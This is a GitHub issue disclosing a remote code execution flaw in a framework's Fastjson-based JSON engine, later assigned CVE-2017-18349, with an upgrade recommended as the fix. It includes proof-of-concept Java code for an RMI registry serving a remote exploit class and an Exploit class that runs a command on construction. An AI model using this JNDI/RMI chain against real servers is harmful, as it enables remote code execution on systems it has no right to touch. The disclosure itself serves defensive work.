Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

lead to RCE when parse JSON string with Fastjson #466

idealzh opened this issue Oct 15, 2018 · 2 comments


None yet
3 participants
Copy link

commented Oct 15, 2018

The component FastjsonEngine converts a JSON string to an equivalent Java Object based on Fastjson(version 1.2.8);
However,Fastjson version 1.2.24 and prior has a remote code execution vulnerability.
for details,please refer to the links below:基于JdbcRowSetImpl的Fastjson%20RCE%20PoC构造与分析/
Upgrade to Fastjson version 1.2.45 or later can fix the issue.

Using the following code snippet to convert a JSON string:

POST("/json",routeContext ->{ String data=routeContext.getRequest().getBody(); FastjsonEngine engine=new FastjsonEngine(); engine.fromString(data, String.class); });

To exploit the vulnerability successfully,we need the following steps:
step1:start a rmi service;
public class Test { /** * @param args * @throws RemoteException */ public static void main(String[] args) throws RemoteException { // TODO Auto-generated method stub Registry registry=LocateRegistry.createRegistry(1099); Reference reference=new Reference("Exploit","Exploit",""); ReferenceWrapper referenceWrapper = null; try { referenceWrapper = new ReferenceWrapper(reference); } catch (NamingException e1) { // TODO Auto-generated catch block e1.printStackTrace(); } try { registry.bind("Exploit",referenceWrapper); } catch (AlreadyBoundException e) { // TODO Auto-generated catch block e.printStackTrace(); } System.out.println("rmi server started......"); } }

step2:put the Exploit.class under a web service directory which pointed by the rmi service above;
public class Exploit{ public Exploit(){ try{ Runtime.getRuntime().exec("calc"); } catch(Exception e){ e.printStackTrace(); } } }

step3:send a post request contains the malicious JSON string;


This comment has been minimized.

Copy link

commented Oct 25, 2018

@idealzh Thank you for reporting this issue and your suggestion of how to fix it!


This comment has been minimized.

Copy link

commented Oct 25, 2018

CVE-2017-18349 was assigned to this issue.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.